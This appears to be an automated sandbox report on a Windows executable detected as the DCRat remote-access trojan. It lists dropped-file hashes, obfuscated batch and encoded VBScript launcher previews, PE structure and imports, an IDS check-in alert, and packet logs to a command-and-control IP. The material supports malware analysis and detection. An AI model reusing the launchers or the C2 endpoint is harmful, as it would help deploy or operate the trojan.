                                                            SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                            SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                            Malicious:true
                                                            Process:C:\Users\user\Desktop\o9jDrpZrgR.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1300992
                                                            Entropy (8bit):5.0586566573608085
                                                            Encrypted:false
                                                            SSDEEP:24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
                                                            MD5:295BF8D9B734730EFA567C8DA9918FE1
                                                            SHA1:09AABC018DA124BD0EBE8E1043860015AC71AA34
                                                            SHA-256:7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
                                                            SHA-512:C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, Author: Joe Security
                                                            Process:C:\Users\user\Desktop\o9jDrpZrgR.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):90
                                                            Entropy (8bit):4.857868096041212
                                                            Encrypted:false
                                                            SSDEEP:3:b+AETbi2Vi0imEP4XLCJmPVATJp0Ax:b+vi2ViqXLC0tAT/b
                                                            MD5:027418C1F52C54C2519A267460BF1214
                                                            SHA1:F8E2F6AF10F7E8BF8A94DAF8EA953E18637C52D6
                                                            SHA-256:9B0BECAC125E51675754B4363A01CF1619854897AA2B72FCE6ECD4BAE074B286
                                                            SHA-512:93BAF1B964BF3219B45A08FF52EED669389E634B67E39FE8AC3EB913D86824074192794790802E2ACBA2B1E9119DA4520A123584D43B9BEA780BB5060711BF49
                                                            Malicious:false
                                                            Preview:%FiYvAhn%%wRBvrRgiN%..%YiFMNpGQ%"C:\reviewruntimeMonitor/BlockrefBrokerperf.exe"%lmQeqtqW%
                                                            Process:C:\Users\user\Desktop\o9jDrpZrgR.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):226
                                                            Entropy (8bit):5.8721052848438005
                                                            Encrypted:false
                                                            SSDEEP:6:GFtkvwqK+NkLzWbHyrFnBaORbM5nC++nMVO5AHI9:GFFMCzWLyhBaORbQC++nM3o9
                                                            MD5:7D4BD2B9160E289AA7B92B5F13E5000F
                                                            SHA1:FF50208F3523239764F6397B1D19909F4E0C45A8
                                                            SHA-256:BA473C76F44D3537ADDD866EB8B5E59CF3BAC1776FBA6E0131B69E914EB706C4
                                                            SHA-512:A5CC9E9C40208E2243BBF35990FA143F02EE62B6AE7EB65D5A89D8994E60378ACD497E71E76AE18709214871B91CEFDE18B38E7377BE2AA750E053B8B69EC1C5
                                                            Malicious:false
                                                            Preview:#@~^yQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vF{!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z..\b+hME.Oks+\W.kOGMzzoWDAhK95%w^LGwCk1qNK*2n"la| 8mYJS~Z~~0msk+QUEAAA==^#~@.
                                                            Process:C:\Windows\System32\PING.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):502
                                                            Entropy (8bit):4.6048426069826895
                                                            Encrypted:false
                                                            SSDEEP:12:PZ5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:LdUOAokItULVDv
                                                            MD5:3772C8A6BE7A12366E9B4E96F4489643
                                                            SHA1:4E93A70C1604E3A378B0A6330BD7C7C4CE7AB6DE
                                                            SHA-256:815727123D8C135F839CC45D3AB906B47EEAC9FE23AF26CBBB5B931E56F975AA
                                                            SHA-512:C19DF3B7E1A809E7B7093A8F8C60D7E60DEA489D8F7D614D454E815A16D7F92363B439E380FADBA1CCA0BEEED2915855BF168E79A3D6DE49DF4BE46A29759767
                                                            Malicious:false
                                                            Preview:..Pinging 045012 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):5.562432966697646
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:o9jDrpZrgR.exe
                                                            File size:1'622'827 bytes
                                                            MD5:c256204deb01c77e21ba17b5e2411245
                                                            SHA1:95ae7fb9f6710368e44a3c4e839d3d7bebbd4d5e
                                                            SHA256:f594822a45b8561a9b7a2e2ecf17558a692b1a193cf231617ba1b222723ca3ab
                                                            SHA512:f3e1f38c059ce56801382c6de631d7b90077fa77a2eb997906d2f6eef8dafe38ab041f023a11b27da41b87edb16484fb095e1053e4b01204412f3a586cd34c52
                                                            SSDEEP:24576:2TbBv5rUyXVZJQCx441vcF3iE0npCoc1cQhWdB7in6D+6:IBJLQCvvcF3KpSu
                                                            TLSH:F975F7203DEB503AF173EFB55AE0759ADA6EF6B33707999E205003864713B80DD9163A
                                                            Icon Hash:1515d4d4442f2d2d
                                                            Entrypoint:0x41f530
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                            Instruction
                                                            call 00007FB4D4DA4EABh
                                                            jmp 00007FB4D4DA47BDh
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            push esi
                                                            push dword ptr [ebp+08h]
                                                            mov esi, ecx
                                                            call 00007FB4D4D97607h
                                                            mov dword ptr [esi], 004356D0h
                                                            mov eax, esi
                                                            pop esi
                                                            pop ebp
                                                            retn 0004h
                                                            and dword ptr [ecx+04h], 00000000h
                                                            mov eax, ecx
                                                            and dword ptr [ecx+08h], 00000000h
                                                            mov dword ptr [ecx+04h], 004356D8h
                                                            mov dword ptr [ecx], 004356D0h
                                                            ret
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            push esi
                                                            mov esi, ecx
                                                            lea eax, dword ptr [esi+04h]
                                                            mov dword ptr [esi], 004356B8h
                                                            push eax
                                                            call 00007FB4D4DA7C4Fh
                                                            test byte ptr [ebp+08h], 00000001h
                                                            pop ecx
                                                            je 00007FB4D4DA494Ch
                                                            push 0000000Ch
                                                            push esi
                                                            call 00007FB4D4DA3F09h
                                                            pop ecx
                                                            pop ecx
                                                            mov eax, esi
                                                            pop esi
                                                            pop ebp
                                                            retn 0004h
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007FB4D4D97582h
                                                            push 0043BEF0h
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007FB4D4DA7709h
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007FB4D4DA48C8h
                                                            push 0043C0F4h
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007FB4D4DA76ECh
                                                            int3
                                                            jmp 00007FB4D4DA9187h
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push 00422900h
                                                            push dword ptr fs:[00000000h]
                                                            Programming Language:
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0xdff8 | 0xe000 | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x72000 | 0x233c | 0x2400 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/21/23-04:47:24.543305 | TCP | 2048095 | ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) | 49712 | 80 | 192.168.2.5 | 77.91.124.101
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Nov 21, 2023 04:47:31.958369017 CET804972077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:31.958381891 CET804972077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:31.958623886 CET4972080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.163883924 CET804972077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.163897038 CET804972077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.168170929 CET804972077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.198146105 CET4972180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.212902069 CET4972080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.295423985 CET4972280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.396799088 CET804972177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.396950960 CET4972180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.397201061 CET4972180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.492626905 CET804972277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.492827892 CET4972280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.493082047 CET4972280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.596533060 CET804972177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.596981049 CET804972177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.597275019 CET4972180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.690073967 CET804972277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.690172911 CET804972277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.690422058 CET4972280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.795871019 CET804972177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.795886993 CET804972177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.802401066 CET804972177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.853647947 CET4972180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.887752056 CET804972277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.887756109 CET804972277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.893771887 CET804972277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.947360039 CET4972280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.024019003 CET4972180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.024043083 CET4972080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.024182081 CET4972280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.024732113 CET4972380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.222235918 CET804972277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.222397089 CET4972280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.222557068 CET804972077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.222608089 CET4972080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.222876072 CET804972377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.222959995 CET4972380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.223157883 CET4972380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.223634005 CET804972177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.223684072 CET4972180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.420738935 CET804972377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.420999050 CET804972377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.421247959 CET4972380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.618938923 CET804972377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.625627041 CET804972377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.666075945 CET4972380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.752722979 CET4972480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.951730967 CET804972477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.951821089 CET4972480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.952024937 CET4972480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:34.148416996 CET804972477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.148653030 CET804972477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.148940086 CET4972480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:34.351747036 CET804972477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.351785898 CET804972477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.355681896 CET804972477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.400476933 CET4972480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:34.479502916 CET4972480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:34.480133057 CET4972580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:34.676223993 CET804972477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.676398993 CET4972480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:34.677706957 CET804972577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.677783966 CET4972580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:34.678030968 CET4972580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:34.875463963 CET804972577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.875669003 CET804972577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.875929117 CET4972580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.073908091 CET804972577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.073930025 CET804972577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.080408096 CET804972577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.134809971 CET4972580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.200479031 CET4972580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.200953007 CET4972680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.397361994 CET804972677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.397461891 CET4972680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.397778988 CET4972680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.398185015 CET804972577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.398250103 CET4972580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.594203949 CET804972677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.594356060 CET804972677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.594820023 CET4972680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.791397095 CET804972677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.791412115 CET804972677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.797945976 CET804972677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.853562117 CET4972680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.915481091 CET4972680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.915920973 CET4972780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.111917019 CET804972677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.112020016 CET4972680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.113404036 CET804972777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.113504887 CET4972780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.113682032 CET4972780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.311201096 CET804972777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.311444998 CET804972777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.311707973 CET4972780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.509531975 CET804972777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.509562969 CET804972777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.515629053 CET804972777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.556971073 CET4972780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.635565996 CET4972780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.636056900 CET4972880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.833107948 CET804972777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.833302021 CET4972780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.833451033 CET804972877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.833529949 CET4972880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.833880901 CET4972880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:37.031343937 CET804972877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:37.031764984 CET804972877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:37.032001972 CET4972880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:37.229775906 CET804972877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:37.229790926 CET804972877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:37.236182928 CET804972877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:37.291038036 CET4972880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:37.352376938 CET4972880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:37.352777958 CET4972980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:37.555015087 CET804972877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:37.555190086 CET804972977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:37.555212021 CET4972880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:37.555282116 CET4972980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:37.555521011 CET4972980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:37.755757093 CET804972977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:37.755810976 CET804972977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:37.756151915 CET4972980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:37.808342934 CET4973080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:37.828860044 CET4972980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:37.953339100 CET4973180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:37.954015017 CET804972977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:37.954032898 CET804972977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:37.961127996 CET804972977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:37.961213112 CET4972980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:38.006369114 CET804973077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:38.006449938 CET4973080192.168.2.577.91.124.101
